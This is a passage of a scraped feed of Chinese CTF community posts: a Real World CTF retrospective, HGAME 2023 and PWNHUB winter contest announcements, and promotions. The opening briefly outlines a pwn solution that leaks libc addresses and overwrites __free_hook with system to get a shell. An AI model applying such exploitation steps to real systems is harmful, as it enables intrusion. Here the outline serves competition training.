解题思路:

简单解题思路,感兴趣的小伙伴可以后台留言讨论~

无检测的虚拟机

  • 不断利用LOAD,STORE,GLOAD,GSTORE得到栈地址,栈空间中的libc地址
  • 利用计算指令计算出__free_hook-8和system的地址
  • 最后结束的时候触发free -> *__free_hook(&__free_hook-8)实现getshell




5最长青题目<虚拟化安全>

来自四届比赛线上+线下所有题目


上榜理由必考题,还不赶紧划重点?


RWCTF的出题师傅们似乎也格外偏爱虚拟化安全

简直就是RWCTF的长青必考题型。

2018年线下赛一道线上赛三道

2019年线下赛一道

2020年直接升级,唯一一道未解之题就是。

而且据说题目所用还是Oracle 官方真实漏洞

还入选了HITB的演讲议题

简直就是把技术焊死在了赛题上呀






小编因为透露的太多,已经被禁言~

各位计划参赛的小伙伴,可一定要加油哟!

没报名的,还等啥?


解题思路:

在HITB的演讲论坛上,出题师傅陈楠从题目的根本思路进行了分享~没有writeup,但是有更深入的演讲视频,感兴趣的小伙伴直接冲冲冲吧~

【直击HITB】虚拟机逃逸的“挖洞秘籍”


或者还有国外强队——亚军战队Sauercloud的赛后解题思路分享,英文好的伙伴也可以直接点击阅读原文查看。


好了,本期的盘点就到此了
下期小编再和大家聊一聊
赛场上那些非预期解法的题目
对,就是传言中的0 day打比赛哦~
那让我们下期再见!

热爱永不消逝,技术至死不渝
第五届RWCTF等你来战~

阅读原文

跳转微信打开

]]> Tue, 03 Jan 2023 18:33:00 +0800 HGAME 2023 来啦! https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247500495&idx=2&sn=d4fb1892b737b9419bd6d6d3903293a2 Vidar 邀请大家一起过兔兔的奇妙新年 o((&gt;ω&lt; ))o! 安协小天使 2023-01-03 18:33 北京

Vidar 邀请大家一起过兔兔的奇妙新年 o((>ω< ))o!




2023




WELCOME

TO

HGAME.





Vidar-Team





HGAME

HGAME

HGAME


   HGAME 2023  』 即将开始!

或许你还是一个对安全无甚了解的小白

想要通过这四周的时间进行提升

或许你对各方面的知识已经有所涉猎

想要有个平台和机会展示你自己……

HGAME 将助力你踏上信息安全之路!

让我们抱着对安全的兴趣与热爱,

在 HGAME 相遇 !

/







相关信息 💫


主办方:杭州电子科技大学 Vidar-Team

比赛类型:Jeopardy [解题]

比赛形式:线上

比赛平台:hgame.vidar.club

校内 QQ 群:589772767

比赛总 QQ 群:134591168

HGAME 是个人赛形式

同时平台也有反作弊机制

各位同学不要有意或者无意触犯规则噢~


赞助商






比赛日历 📆


比赛开始时间:2023 - 01 - 05

报名截止时间:2023 - 01 - 12

比赛结束时间:2023 - 02 - 06


1

Week 1  抢回家的车票啦>"<! 

2023 - 01 - 05 -- 2023 - 01 - 12

2

Week 2  年货都屯好了吗^_~

2023 - 01 - 12 -- 2023 - 01 - 19

3

Week 3  兔年新年快乐q(≧▽≦q)

2023 - 01 - 23 -- 2023 - 01 - 30

4

Week 4  来跟兔兔一起拜大年!

2023 - 01 - 30 -- 2023 - 02 - 06



每周结算一次

20 点上题,20 点结束

wp 提交时间为本周结束后 24 小时内

(即第二天 20 点截止)

特别注意春节期间会调整时间

Week2 到 Week3 之间会空四天噢


持续一个月时间的 HGAME 

难度会每周逐渐递增

更好地帮助新的 CTFer 入门

最后我们还会有 Final !

( Final 时间待定,仅面对校内同学)




奖项设置 🏆


先来看看校内的奖金!

(校内仅限校内 22 级同学)

今年还新增了单方向榜!

注:1 PWNHUB 金币与 1.5 元人民币等值

每位获奖者都会赠送 PWNHUB 邀请码

排行榜分数相同者,

以先达到该分数的时间次序划定排名



I

一等奖(共一名)

1000 PWNHUB 金币

II

二等奖(共三名)

500 PWNHUB 金币

III

三等奖(共六名)

200 PWNHUB 金币


Final 的奖金也可以提前透露一下!


I

一等奖(共一名)

500 PWNHUB 金币

II

二等奖(共三名)

300 PWNHUB 金币

III

三等奖(共六名)

150 PWNHUB 金币


总体奖项设置(包括校内外所有同学)


I

第一名

1000 PWNHUB 金币

II

第二名

800 PWNHUB 金币

III

第三名

600 PWNHUB 金币

IV

第四名至第十名

300 PWNHUB 金币



校内比赛 QQ 群:589772767


比赛总 QQ 群:134591168







阅读原文

跳转微信打开

]]> Tue, 03 Jan 2023 18:33:00 +0800 PWNHUB2022冬季赛收官,明年见!! https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247500488&idx=1&sn=fa5613b15a3f7b75d4c2253b4a3c12da 听说官方wp已经放出来了!!真的假的 2022-12-20 18:10 北京

听说官方wp已经放出来了!!真的假的

PWNHUB 2022冬季赛

正式收官!!



PWNHUB冬季赛作为2022年度的终局之战,累计吸引503支战队参与,各参赛队伍大咖云集。经过36小时的神仙打架,一份新鲜的排行榜出炉了!


本次比赛共放出30道题目,到比赛结束前30分钟,30道题目均有战队解出。24道题目的前三血被成功拿下,7个方向的赛题均有AK战队,部分题目仅有个别战队解出。

各方向赛题Ak战队数量
web方向:共5道赛题, [Nu1L]战队Ak该方向所有赛题。
pwn方向:共4道赛题,4支战队AK该方向所有赛题。
ppc方向:共3道赛题,[N0wayBack]战队AK该方向所有赛题。
crypto方向:共3道赛题,有7支战队Ak该方向所有赛题。
misc方向:共4道赛题,本场赛事解题数量最多的类型,有8支战队AK该方向所有赛题。
other方向:共3道赛题,作为本场解题数量较多类型之一,共有9个战队AK该方向所有赛题。

gaming方向:共4道题目,有7支战队AK该方向所有赛题,玩游戏是不是有什么路数,[R@dar] [FlagGOGOGO] [N0wayBack] 作为该类型赛题的前三血这边建议出个教程!!

头疼!难搞的是...
reverse方向:作为本场赛题最难搞的类型,共有4道题目,其中3道题目都仅有1支战队解出。

群雄追逐,不分上下!!
12月17日,比赛一开始,各战队便开始发力,crypto、gaming、misc方向的题目便陆续有战队解出。开赛2小时的时候已有46名战队榜上有名,5个方向的题目被拿下,10个题目被成功解出。
在线观看神仙打架!!
12点到15点间,是flag提交的高峰期,各战队选手应该是得到了能量补给,火力全开,疯狂输出,多道赛题的前三血战队开始陆续产生。
22点,赛事进行1/3,可以看到排行榜上多个战队已累计提交十余道题目,各个战队间依旧在进行着激烈的追逐,丝毫没有要休息的意思。
12月18日10:00点,赛事进行到2/3,本场赛事共放出30道赛题,已有24道赛题的前三血被成功拿下,仅剩reverse方向两道赛题暂无战队解出。
直呼各位TQL!!

比赛倒计时2小时,Nu1L战队拿到reverse方向赛题calculous的一血,Volcano战队则拿到reverse方向另一道赛题just try的一血,两块难啃的骨头终于被成功拿下!!ORZ

最后,再次感谢参赛的战队及选手对PWNHUB的支持,同时也感谢本次比赛的出题及运维师傅们。PWNHUB 2022冬季赛,是PWNHUB 2022年度的最后一场比赛,我们明年见!

访问下面链接即可获取,请各位师傅自取!!

https://pan.baidu.com/s/1hqA8iCpxp12MFPj4QREu6Q

提取码: i6rm 



下一场,英雄相见,宝剑出

END

阅读原文

跳转微信打开

]]> Tue, 20 Dec 2022 18:10:00 +0800 PWNHUB2022冬季赛|倒计时1天! https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247500309&idx=1&sn=33a298e74b35a3c3782b78636dbf88d5 明天10点开赛啦! 胖哈勃 2022-12-16 10:00 北京

明天10点开赛啦!

 PWNHUB2022冬季网络安全大赛
倒计时 1 天!
12月17日10:00—12月18日22:00
36小时赛道充斥无限可能
点亮你的高光时刻!!
赛事网址:http://ctf.pwnhub.cn/

问:Real World CTF是什么?


答:

Real World CTF是由长亭科技主办的国际级CTF大赛,全球首创CTF夺旗赛和破解赛结合的全新赛制,特点是赛题基本基于现实世界软件的修改或二次开发。








问:

Real World CTF的体验赛是什么?

答:

考虑到国际赛赛题难度较高,我们设置了只有国际赛40%难度左右的体验赛供大家入门。本届体验赛,我们诚挚邀请高校安全精英们参与进来,与我们的企业客户、合作伙伴共同参与比赛、同台竞技,共享网络安全技术新成果!








问:高校

如何报名体验赛呢?

答:

本次体验赛采用定向邀请制,以战队形式参赛,如有参赛意愿,后台回复“我要报名”获取参赛方式。








问:体验赛比赛

时间是什么时候?

答:

2023年1月8日10:00—1月9日10:00








RealWorld 2023 体验赛高校报名通道开启

后台回复“我要报名”参与赛事!!


END

阅读原文

跳转微信打开

]]> Fri, 16 Dec 2022 10:00:00 +0800 PWNHUB2022冬季赛|倒计时3天! https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247500301&idx=1&sn=5cada74c55e13722a2e34d25deb0dd4c 戴好口罩,我们比赛见! 2022-12-14 10:00 北京

戴好口罩,我们比赛见!

 PWNHUB2022冬季网络安全大赛
倒计时 3 天!
12月17日10:00—12月18日22:00
36小时赛道充斥无限可能
点亮你的高光时刻!!
赛事网址:http://ctf.pwnhub.cn/

问:Real World CTF是什么?


答:

Real World CTF是由长亭科技主办的国际级CTF大赛,全球首创CTF夺旗赛和破解赛结合的全新赛制,特点是赛题基本基于现实世界软件的修改或二次开发。








问:

Real World CTF的体验赛是什么?

答:

考虑到国际赛赛题难度较高,我们设置了只有国际赛40%难度左右的体验赛供大家入门。本届体验赛,我们诚挚邀请高校安全精英们参与进来,与我们的企业客户、合作伙伴共同参与比赛、同台竞技,共享网络安全技术新成果!








问:高校

如何报名体验赛呢?

答:

本次体验赛采用定向邀请制,以战队形式参赛,如有参赛意愿,后台回复“我要报名”获取参赛方式。








问:体验赛比赛

时间是什么时候?

答:

2023年1月8日10:00—1月9日10:00








RealWorld 2023 体验赛高校报名通道开启

后台回复“我要报名”参与赛事!!

《胖哈勃冬季赛》赛前预热  

关注【胖哈勃】公众号

将本篇文章分享至朋友圈并保留截图

中奖后添加小胖哥微信:15711220440 领取奖品

本期奖品为长亭八周年“无限潜能”盲盒套装

点击下方小程序参与抽奖

END

阅读原文

跳转微信打开

]]> Wed, 14 Dec 2022 10:00:00 +0800 printf("Hello, Real World") https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247500035&idx=1&sn=6726c855a218b03edf066bd728cb54aa 蓄势待发 长亭科技 2022-12-09 12:19 北京

蓄势待发


·


阅读原文

跳转微信打开

]]> Fri, 09 Dec 2022 12:19:00 +0800 PWNHUB2022冬季赛|年度终局之战,RW赛前试炼 https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247500028&idx=1&sn=e08cc93d1e5a76492ed307bd9837b745 这么重大的新闻不得提前来爆个料! 2022-11-21 17:40 北京

这么重大的新闻不得提前来爆个料!


第1234期

天气晴朗

长亭新闻

BREAKING NEWS

2022年11月21日

星期一

2022年将要步入尾声

但挑战却从未间断!

辞旧迎新之际,

长亭科技两大赛事喜上热搜。


PWNHUB2022 冬季赛  

12月17日 10:00—12月18日22:00

年度终局之战,震撼来袭!

本次比赛由PWNHUB主办,本次比赛将采用在线网络安全夺旗挑战赛的形式,面向所有热爱网络的人员。比赛36小时赛道充斥无限可能,多类型赛题不仅有质更有趣,致力于打造更好的比赛体验。本次比赛更设有丰富奖金、限量新制周边、内推长亭及长亭合作伙伴实习或工作机会,全面挖掘培养网安人才。


年度终局之战,专属你的战场





竞赛时间12月17日 10:00—12月18日 22:00

报名途径:登录竞赛平台,团队队长注册账号 (每个团队使用同一账号进行答题)

竞赛网址http://ctf.pwnhub.cn/

得分规则:比赛采用动态分数制度 ,每道题目的分值将根据解出队伍的数量进行动态记分。

题目类型:Web、Pwn、Reverse、Misc、Crypto等

竞赛规则:

  • 参赛队伍如有任何违规行为,将被取消比赛资格

  • 禁止不同参赛队伍合作,或者共享flag、hint等任何比赛相关信息;

  • 禁止攻击比赛平台,如果发现平台漏洞,请务必联系比赛交流群的管理者;

  • 禁止在比赛中妨碍其他队伍解题,例如对比赛题目环境进行破坏;

  • 禁止往比赛平台发送大量流量;

  • 禁止对提交的flag进行爆破;

  • 获奖的队伍必须提交完整的解题报告;

  • 在公平合理的前提下,主办方有权修改包括赛题、规则等一切事项。

赛事交流群:961142262(QQ群





超多奖品,勇士加冕




01

优秀战队金币瓜分

第1名:PWNHUB金币5000

第2名:PWNHUB金币2000

第3名:PWNHUB金币1000 

第4名:PWNHUB金币500 

第5名:PWNHUB金币200

02

RealWorld、PWNHUB周边花落谁家?

第1-5名:RealWorld新一期周边套装

第6-10名:PWNHUB2022周边套装

一血勇士:PWNHUB平台邀请码一枚

03

超多offer等你来拿!!

前30名战队优秀选手:内推长亭科技及长亭合作伙伴实习or工作机会

就业岗位包括但不限于:

安全服务工程师

后端开发工程师

移动安全工程师

红队攻防工程师

安全运营工程师

...

扫描上方二维码注册账号

《胖哈勃冬季赛》赛前预热  

关注【胖哈勃】公众号

将本篇文章分享至朋友圈并保留截图

中奖后添加小胖哥微信:15711220440 领取奖品

本期奖品为长亭八周年“无限潜能”盲盒套装

点击下方小程序参与抽奖

END

阅读原文

跳转微信打开

]]> Mon, 21 Nov 2022 17:40:00 +0800 你有一条私聊请查收... https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247499062&idx=1&sn=ff61003bfaeddf707daaf61d9a0a3871 这一期内容千万不要错过~ 2022-09-27 18:00 北京

这一期内容千万不要错过~

PWNHUB STUDY HARD

PWNHUB内部赛题目汇总

CTF赛题


往期比赛题目


“小胖小胖~比赛环境关了啊,还想复现一下呢”
总是有胖友在问往期比赛的题目环境怎么获取,环境可不可以再开放一下?这次小胖哥将近两年内内部赛题目的环境重新开放了,访问链接https://pwnhub.cn/gamedetail?id=49 无需参与报名即可看到往期内部赛的题目,仅供训练。


也想做题但是还没有邀请码怎么办?

那快来参与一下下面这个活动先来获取一枚邀请码




PWNHUB赏金计划



距离PWNHUB赏金计划夏日认证活动公布第一批通关讲师的名单已经过去 46 天了

听说通关的小伙伴获得了:


在如今这个竞争愈烈的环境下,多get一项技能可以使自己多一个可选择的机会。

PWNHUB赏金计划长期进行中,随时欢迎你的参与。直接私聊小胖哥发送“我要参与”即可咨询活动相关信息,滑动下方图片跟随小胖一起来回顾一下活动详情内容吧。


☟左右滑动查看更多

Slide for more





通关奖励|奖品更新



通关成功者,根据综合评分进行讲师评级认证,颁发证书(通关认证讲师分为金牌讲师、银牌讲师和铜牌讲师)。


金牌讲师🏅️:亭八周年“无限潜能手办”盲盒套装+ 长亭培训项目优先获得权 【免面试】+内部学习资料+PWNHUB社区邀请码+...


银牌讲师🥈:长亭八周年“无限潜能手办”盲盒*3+ 长亭培训项目优先获得权 +内部学习资料+PWNHUB社区邀请码+...


铜牌讲师🥉:长亭八周年“无限潜能手办”盲盒*1+ 长亭培训项目优先获得权 + 内部学习资料+PWNHUB社区邀请码+..

在PWNHUB赏金计划中,萌新将会获得专业培训讲师一对一指导,拥有更多提升机会;有经验者在各种礼物拿到手软的同时将直达真实项目,获得更多兼职机会。

有任何问题可以随时Q小胖哥(QQ:3496544941  vx15711220440)欢迎前来参与咨询~






PWNHUB(昵称:胖哈勃),遥远的1990年,哈勃望远镜拓展了人类仰望星空的界限。2016年,PWNHUB诞生,将引领那些对网络安全感兴趣的人们探索“01”世界中的无限奥秘……

 

PWNHUB致力打造顶尖网络安全攻防交流平台,为网络安全爱好者与研究者提供一个碰撞思维、提升技术的线上场所。每月一次CTF攻防赛,定期组织线下技术沙龙与工作坊。PWNHUB崇尚自由探索的极客精神,以高质量的纯原创题目汇集了一大批高水平的CTF选手与战队。

阅读原文

跳转微信打开

]]> Tue, 27 Sep 2022 18:00:00 +0800